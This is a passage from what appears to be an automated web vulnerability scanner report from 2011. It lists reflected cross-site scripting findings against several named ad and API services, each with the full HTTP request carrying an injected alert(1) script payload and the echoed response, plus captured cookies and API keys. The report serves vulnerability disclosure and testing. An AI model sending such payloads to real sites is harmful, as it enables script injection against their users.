e%3Bsub=the-scene-index%3Bsub2=%3Bcontentid=%3Bkw=%3BmtfIFPath=/includes/%3Btile=3%3Bpos=2%3Bsz=300x250,300x600%3B!category=refresh%3Brefresh=true%3Bpm=1%3Blsg=22368%3B~aopt=2/0/b2/0%3B~sscs=%3F$CTURL$9ef9e'-alert(1)-'3f0794b59ee&time=3|13:21|-5&flash=10&server=portalserve&bu=3256613822');

3.9. http://ads.pointroll.com/PortalServe/ [time parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The value of the time request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7532b'%3balert(1)//4a891d65b27 was submitted in the time parameter. This input was echoed as 7532b';alert(1)//4a891d65b27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PortalServe/?pid=1409315L44120110908171336&flash=10&time=3|13:21|-57532b'%3balert(1)//4a891d65b27&redir=http://iv.doubleclick.net/click%3Bh%3Dv8/3b97/3/0/%2a/o%3B243504980%3B1-0%3B1%3B60663747%3B4986-300/600%3B44392852/44410639/1%3B%3B%7Eokv%3D%3B%21category%3Dny%3B%21category%3Dthe-scene%3B%21category%3Dbottom%3Bsite%3Dny%3Bpid%3D%3Bsect%3Dthe-scene%3Bsub%3Dthe-scene-index%3Bsub2%3D%3Bcontentid%3D%3Bkw%3D%3BmtfIFPath%3D/includes/%3Btile%3D3%3Bpos%3D2%3Bsz%3D300x250%2C300x600%3B%21category%3Drefresh%3Brefresh%3Dtrue%3Bpm%3D1%3Blsg%3D22368%3B%7Eaopt%3D2/0/b2/0%3B%7Esscs%3D%3f$CTURL$&pos=x&dom=http://www.nbcnewyork.com&r=0.38880528369918466 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://iv.doubleclick.net/adi/nbcu.lim.ny/the-scene-index;!category=ny;!category=the-scene;!category=bottom;site=ny;pid=;sect=the-scene;sub=the-scene-index;sub2=;contentid=;kw=;mtfIFPath=/includes/;tile=3;pos=2;sz=300x250,300x600;!category=refresh;refresh=true;pm=1;lsg=22368;ord=533318422036?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; F1FuWM=4*1317839769; F1GBxd=1*1317852302; PRvt=CKJ9xErENUwPwYAcUBBeJ6TErNHYxA5IBd7BCeJ5DErTb9CAIFAC9BBeJ7WErTb9avgKAAGBBeJNRErllKsxwcASKBBeKG9ErlmBbHqUAB3BAeKMrErn3uJDv8AEUBAeJP7Ern6nyhcfADrBBeJyuEro4I5LOiABWBAeKJcEro4f5YWRAMZBAe; PRgo=BBBAAsJvCBVBF4FRCDhFS!B; PRimp=8EAE0400-3F59-124F-1209-1FB0026B0100; PRca=|AKoY*9320:1|AJil*562:2|AK0w*562:2|AKAH*47:1|AJrB*1871:1|AKrj*1495:1|AKmB*47:5|AJvZ*396:1|AKkS*9227:1|AKlp*1278:1|AJoR*343:1|AKjB*15:2|AK9q*1646:2|AK73*1646:1|AKdX*1153:2|AKfC*298:1|AK8l*9320:1|AJtM*1737:2|AJsM*154:1|AKln*9320:3|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKoYAC0U:1|AJilAAJE:2|AK0wAAJE:2|AKAHAAAl:1|AJrBAA4L:1|AKrjAAYH:1|AKmBAAAl:5|AJvZAAGY:1|AKkSACYp:1|AKlpAAUc:1|AJoRAAF7:1|AKjBAAF7:1|AKjBAAAP:1|AK9qAA08:2|AK73AA08:1|AKdXAASb:2|AKfCAAEo:1|AK8lAC0U:1|AJtMAA2B:2|AJsMAAC4:1|AKlnAC0U:3|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|FvLB:1|ErY8:2|Fc3m:2|GBoD:1|GBxd:1|Etx2:1|GBJ0:1|FuWM:4|EvC9:1|Fyu4:1|FsBu:1|FiNl:1|FwPI:1|FwO9:1|FeMB:1|FeMC:1|FdKz:1|FjZG:1|Fj1N:1|FnKl:1|Fgi2:1|FrMI:1|FrMW:1|F2Bj:1|FrlJ:3|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GXmL:1|GJup:2|GQzk:2|GKY8:1|GSVD:1|GZZh:1|GZPz:1|GZZd:2|GZZc:2|Fz04:1|GY7h:1|GWZl:1|Fz7o:1|GYaN:2|GRns:1|GRno:1|GRQ2:1|GUPB:1|GUPA:1|GVWz:1|GWPi:1|GJ9J:1|GMBD:1|GMud:1|GW7X:3|GV2B:1|GV12:2|GSur:3|#; PRpc=|FvLBGXmL:1|ErY8GJup:2|Fc3mGQzk:2|GBoDGKY8:1|GBxdGZZc:1|Etx2GSVD:1|FuWMGZZh:1|GBJ0GZPz:1|FuWMGZZd:2|FuWMGZZc:1|EvC9Fz04:1|Fyu4GY7h:1|FsBuGWZl:1|FiNlFz7o:1|FwPIGYaN:1|FwO9GYaN:1|FeMBGRns:1|FeMCGRno:1|FdKzGRQ2:1|FjZGGUPB:1|Fj1NGUPA:1|FnKlGVWz:1|Fgi2GWPi:1|FrMIGJ9J:1|FrMWGMBD:1|F2BjGMud:1|FrlJGW7X:3|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 05 Oct 2011 18:21:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

location.replace('http://www.nbcnewyork.com/includes/PointRollAds.htm?pid=1409315L44120110908171336&redir=http://iv.doubleclick.net/click%3Bh=v8/3b97/3/0/*/o%3B243504980%3B1-0%3B1%3B60663747%3B4986-30
...[SNIP]...
e-index%3Bsub2=%3Bcontentid=%3Bkw=%3BmtfIFPath=/includes/%3Btile=3%3Bpos=2%3Bsz=300x250,300x600%3B!category=refresh%3Brefresh=true%3Bpm=1%3Blsg=22368%3B~aopt=2/0/b2/0%3B~sscs=%3F$CTURL$&time=3|13:21|-57532b';alert(1)//4a891d65b27&flash=10&server=portalserve&bu=279973245');

3.10. http://api.bizographics.com/v1/profile.json [&callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the &callback request parameter is copied into the HTML document as plain text between tags. The payload 785f4<script>alert(1)</script>66aad21ad39 was submitted in the &callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData785f4<script>alert(1)</script>66aad21ad39&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://online.wsj.com/public/page/0_0_WP_2300_NewsReel.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Wed, 05 Oct 2011 21:13:20 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 283
Connection: keep-alive

dj.module.ad.bio.loadBizoData785f4<script>alert(1)</script>66aad21ad39({"bizographics":{"group":{"code":"tech_business_professional","name":"Tech Business Professional"},"industry":[{"code":"software","name":"Software"}],"location":{"code":"texas","name":"USA - Texas"}},
...[SNIP]...

3.11. http://api.bizographics.com/v1/profile.json [api_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload d311a<script>alert(1)</script>1d048d63422 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvund311a<script>alert(1)</script>1d048d63422 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://online.wsj.com/public/page/0_0_WP_2300_NewsReel.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 05 Oct 2011 21:13:27 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=ebdfc38c-c239-4c92-be51-9d834d35dbf2;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 84
Connection: keep-alive

Unknown API key: (r9t72482usanbp6sphprhvund311a<script>alert(1)</script>1d048d63422)

3.12. http://api.bizographics.com/v1/profile.redirect [api_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 659a8<script>alert(1)</script>97957b9b5b8 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=798c7ba2e6b04aec86d660f36f6341a5659a8<script>alert(1)</script>97957b9b5b8&callback_url=http://rt.legolas-media.com/lgrt?ci=1%26ei=21%26ti=95%26vi=11%26sti=0%26sei=0%26sci=0%26sai=0%26smi=0%26pbi=0%26sts=1317838668564784%26sui=5ea31fa9-d42d-458f-9bb4-1700d69738c0 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nbcnewyork.com/news/local/Helicopter-Crash-East-River-Death-Tourist-Rescue-Victims-Bloomberg--131125518.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 05 Oct 2011 18:21:09 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=ebdfc38c-c239-4c92-be51-9d834d35dbf2;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 92
Connection: keep-alive

Unknown API key: (798c7ba2e6b04aec86d660f36f6341a5659a8<script>alert(1)</script>97957b9b5b8)

3.13. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.redirect

Issue detail

The value of the callback_url request parameter is copied into the HTML document as plain text between tags. The payload 7326d<script>alert(1)</script>eba2e7e64dc was submitted in the callback_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?api_key=798c7ba2e6b04aec86d660f36f6341a5&callback_url=7326d<script>alert(1)</script>eba2e7e64dc HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nbcnewyork.com/news/local/Helicopter-Crash-East-River-Death-Tourist-Rescue-Victims-Bloomberg--131125518.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Wed, 05 Oct 2011 18:21:16 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=ebdfc38c-c239-4c92-be51-9d834d35dbf2;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 58
Connection: keep-alive

Unknown Referer: 7326d<script>alert(1)</script>eba2e7e64dc

3.14. http://api.v2.badgeville.com/api/widgets/4e261f7efffffa1312583821/thenextweb.com.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.v2.badgeville.com
Path:   /api/widgets/4e261f7efffffa1312583821/thenextweb.com.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload e453e<script>alert(1)</script>91a75530fb2 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/widgets/4e261f7efffffa1312583821/thenextweb.com.json?callback=Badgeville.bv_cp0e453e<script>alert(1)</script>91a75530fb2&version=v2&_=1317847267367 HTTP/1.1
Host: api.v2.badgeville.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.55
Date: Wed, 05 Oct 2011 20:41:25 GMT
Content-Type: text/javascript; charset=utf-8
Connection: close
Status: 200 OK
Last-Modified: Tue, 16 Aug 2011 18:14:07 GMT
X-Runtime: 0.041403
Set-Cookie: _Badgeville_session=BAh7BiIPc2Vzc2lvbl9pZCIlNDdkZjY3NDk4YTgzNGYxYmI4NzYwYjRiM2IxNGU2MzA%3D--8b852118631080b84e9d274ba37434848f105084; path=/; expires=Wed, 19-Oct-2011 20:41:25 GMT; HttpOnly
Cache-Control: max-age=0, private, must-revalidate
Content-Length: 1408

Badgeville.bv_cp0e453e<script>alert(1)</script>91a75530fb2({"data":{"pics":{"default_user_pic":"http://api.v2.badgeville.com/images/misc/missing/bar/user_nopicture.png","sample_trophy":"http://s3.amazonaws.com/badgeville-production-reward-definitions/images/4
...[SNIP]...

3.15. http://api.v2.badgeville.com/api/widgets/4e261f7efffffa1312583821/thenextweb.com/players/leaderboard.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.v2.badgeville.com
Path:   /api/widgets/4e261f7efffffa1312583821/thenextweb.com/players/leaderboard.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 7b394<script>alert(1)</script>7728f0b8339 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/widgets/4e261f7efffffa1312583821/thenextweb.com/players/leaderboard.json?callback=Badgeville.bv_cp17b394<script>alert(1)</script>7728f0b8339&name=week&version=v2&disabled=false&skin=current&per_page=10&orientation=vertical&requireUser=false&foundMe=false&_=1317847269414 HTTP/1.1
Host: api.v2.badgeville.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://thenextweb.com/insider/2011/06/25/why-turntable-fm-is-the-most-exciting-social-service-of-the-year/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _Badgeville_session=BAh7BiIPc2Vzc2lvbl9pZCIlNDdkZjY3NDk4YTgzNGYxYmI4NzYwYjRiM2IxNGU2MzA%3D--8b852118631080b84e9d274ba37434848f105084

Response

HTTP/1.1 200 OK
Server: nginx/0.8.55
Date: Wed, 05 Oct 2011 20:41:46 GMT
Content-Type: text/javascript; charset=utf-8
Connection: close
Status: 200 OK
ETag: "cc1d433f84903555a149399ade5fcf98"
X-Runtime: 0.116828
Set-Cookie: _Badgeville_session=BAh7BiIPc2Vzc2lvbl9pZCIlY2Q4NzM5NjVjZjg3NTcxOGRkMzQyOWQwOTMzOTRjMjM%3D--42f5a63c4f36b2d90994d061fbcf8213310236fe; path=/; expires=Wed, 19-Oct-2011 20:41:46 GMT; HttpOnly
Cache-Control: max-age=0, private, must-revalidate
Content-Length: 27908

Badgeville.bv_cp17b394<script>alert(1)</script>7728f0b8339({"data":[{"leaderboards":{"week":{"label":null,"position":1,"points":1740}},"points_day":640.0,"facebook_id":null,"facebook_link":null,"last_reward":{"name":"White Belt","history":{"toast":{"4e261f5ea
...[SNIP]...

3.16. http://ar.voicefive.com/b/rc.pli [func parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload a284e<script>alert(1)</script>2bf29bd6e1a was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteractiona284e<script>alert(1)</script>2bf29bd6e1a&n=ar_int_p91136705&1317849138654 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://view.atdmt.com/NYC/iview/309859443/direct;wi.300;hi.250/01/6156874?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b97/3/0/%2a/p%3B240309425%3B0-0%3B0%3B33078169%3B4307-300/250%3B41509016/41526803/1%3Bu%3D%2A%2A%2A%2A300x250%2C336x280%2A%2A%2A%2A%2A%2A%2A%2A%3B%7Eokv%3D%3Bu%3D%2A%2A%2A%2A300x250%2C336x280%2A%2A%2A%2A%2A%2A%2A%2A%3B%3Bmc%3Db2pfreezone%3Btile%3D1%3Bsz%3D300x250%2C336x280%3B%3B%7Eaopt%3D2/0/ff/0%3B%7Esscs%3D%3f
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p90175839=exp=1&initExp=Thu Sep 1 00:18:01 2011&recExp=Thu Sep 1 00:18:01 2011&prad=3992133314369593&arc=6108751&; ar_p81479006=exp=1&initExp=Sun Sep 4 12:13:57 2011&recExp=Sun Sep 4 12:13:57 2011&prad=58778952&rn=6216791&arc=40380395&; ar_p110620504=exp=1&initExp=Wed Sep 7 12:21:12 2011&recExp=Wed Sep 7 12:21:12 2011&prad=309859439&arc=226794541&; ar_p63514475=exp=1&initExp=Sat Sep 17 00:53:01 2011&recExp=Sat Sep 17 00:53:01 2011&prad=348445181&arc=233006068&; ar_p109848095=exp=1&initExp=Sat Sep 17 00:57:53 2011&recExp=Sat Sep 17 00:57:53 2011&prad=70982068&arc=43901049&; ar_p108883753=exp=2&initExp=Sat Sep 17 13:03:59 2011&recExp=Sat Sep 17 13:51:03 2011&prad=65659550&arc=42804711&; ar_p82806590=exp=3&initExp=Sun Sep 4 12:13:34 2011&recExp=Sun Sep 25 09:06:26 2011&prad=65097043&arc=40380915&; ar_p120927104=exp=1&initExp=Mon Oct 3 16:32:52 2011&recExp=Mon Oct 3 16:32:52 2011&prad=1425782&arc=1524313&; ar_p117672109=exp=1&initExp=Tue Oct 4 18:40:11 2011&recExp=Tue Oct 4 18:40:11 2011&prad=3109717&arc=6523339&; UID=9cc29993-80.67.74.150-1314836282; UIDR=1317753620; ar_p119936314=exp=2&initExp=Sun Oct 2 23:59:13 2011&recExp=Wed Oct 5 14:32:48 2011&prad=71054949&arc=43921375&; ar_p91136705=exp=1&initExp=Wed Oct 5 21:12:09 2011&recExp=Wed Oct 5 21:12:09 2011&prad=309859443&arc=206710353&; BMX_3PC=1; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1317849131%2E026%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 05 Oct 2011 21:13:08 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteractiona284e<script>alert(1)</script>2bf29bd6e1a("");

3.17. http://as.chango.com/links/adunit/1.31784957539e+12 [adpos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784957539e+12

Issue detail

The value of the adpos request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a36e"><script>alert(1)</script>5f73c1757ef was submitted in the adpos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784957539e+12?adid=13713&adpos=04a36e"><script>alert(1)</script>5f73c1757ef&agid=11720&atype=HISTORIC&bidder=bidder03-sj-west&bm=1.35773620016&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYugoHt2Y2Oheg&eid=Rubicon&ht=250&ibs=None&kf=452151&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=b9930120-ef97-11e0-9408-00259035e51e&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849575383&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories&wh=300&wp=2A68251C3E718625&sig=e682501f8c01fe1c4019354e8f499890 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; cc.i.10449=13715%7Cnews.com.au%7C5829597%7CRubicon%7C10449%7Cnamemedia%7C11782%7Cbroad; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_ab=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "89efd49fd743ab27e4e474041a8357c453bb0966"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2227
Date: Wed, 05 Oct 2011 21:34:17 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e303fb907dd06973053; Domain=chango.com; expires=Sat, 02 Oct 2021 21:34:17 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:34:17 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
&cid=10449&agid=11720&sid=b9930120-ef97-11e0-9408-00259035e51e&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.35773620016&wp=1.330389&kw=Malware+freeware&uf=0&kf=452151&atype=HISTORIC&test=0&adpos=04a36e"><script>alert(1)</script>5f73c1757ef&bidder=bidder03-sj-west&ioi=13672&ts=1317849575383&sig=e682501f8c01fe1c4019354e8f499890&cu=&dsi=None&clickURL=">
...[SNIP]...

3.18. http://as.chango.com/links/adunit/1.31784957539e+12 [atype parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784957539e+12

Issue detail

The value of the atype request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bafe3"><script>alert(1)</script>689ab2541e9 was submitted in the atype parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /links/adunit/1.31784957539e+12?adid=13713&adpos=0&agid=11720&atype=HISTORICbafe3"><script>alert(1)</script>689ab2541e9&bidder=bidder03-sj-west&bm=1.35773620016&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=wattpad.com&dsi=None&ebp=o2FngYugoHt2Y2Oheg&eid=Rubicon&ht=250&ibs=None&kf=452151&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=b9930120-ef97-11e0-9408-00259035e51e&st=broad&stid=wattpad.com&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317849575383&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.wattpad.com%2Fstories&wh=300&wp=2A68251C3E718625&sig=e682501f8c01fe1c4019354e8f499890 HTTP/1.1
Host: as.chango.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://optimized-by.rubiconproject.com/a/7941/12756/23272-15.html?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _i_admeld=1; _i_ca=1; _i_ox=1; _i_cw=1; _i_an=1; _i_rc=1; cc.i.10449=13715%7Cnews.com.au%7C5829597%7CRubicon%7C10449%7Cnamemedia%7C11782%7Cbroad; _t=b6ae888c-d95b-11e0-b096-0025900e0834; _i_ab=1

Response

HTTP/1.1 200 OK
Server: Chango RTB Server
ETag: "8b7acc5c2a50b2822a4fb378e5645327d2808ba4"
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 2230
Date: Wed, 05 Oct 2011 21:34:17 GMT
Connection: close
Set-Cookie: _t=b6ae888c-d95b-11e0-b096-0025900e0834c72d5e303fb907dd06973053; Domain=chango.com; expires=Sat, 02 Oct 2021 21:34:17 GMT; Path=/
Set-Cookie: cc.i.10449=13713%7Cwattpad.com%7C5827704%7CRubicon%7C10449%7Cnamemedia%7C11720%7Cbroad; Domain=chango.com; expires=Fri, 04 Nov 2011 21:34:17 GMT; Path=/

<html><head><title></title>
</head><body style='margin:0;padding:0;'><script type="text/javascript"></script><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6677.28618
...[SNIP]...
704&eid=Rubicon&cid=10449&agid=11720&sid=b9930120-ef97-11e0-9408-00259035e51e&dc=namemedia&datc=san jose&da=10087&st=broad&bm=1.35773620016&wp=1.330389&kw=Malware+freeware&uf=0&kf=452151&atype=HISTORICbafe3"><script>alert(1)</script>689ab2541e9&test=0&adpos=0&bidder=bidder03-sj-west&ioi=13672&ts=1317849575383&sig=e682501f8c01fe1c4019354e8f499890&cu=&dsi=None&clickURL=">
...[SNIP]...

3.19. http://as.chango.com/links/adunit/1.31784957539e+12 [bidder parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.chango.com
Path:   /links/adunit/1.31784957539e+12

Issue detail

The value of the bidder request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13ead"><script>alert(1)</script>17c0bcecbe5 was submitted in the bidder parameter. This input was echoed unmodified in the application's response.

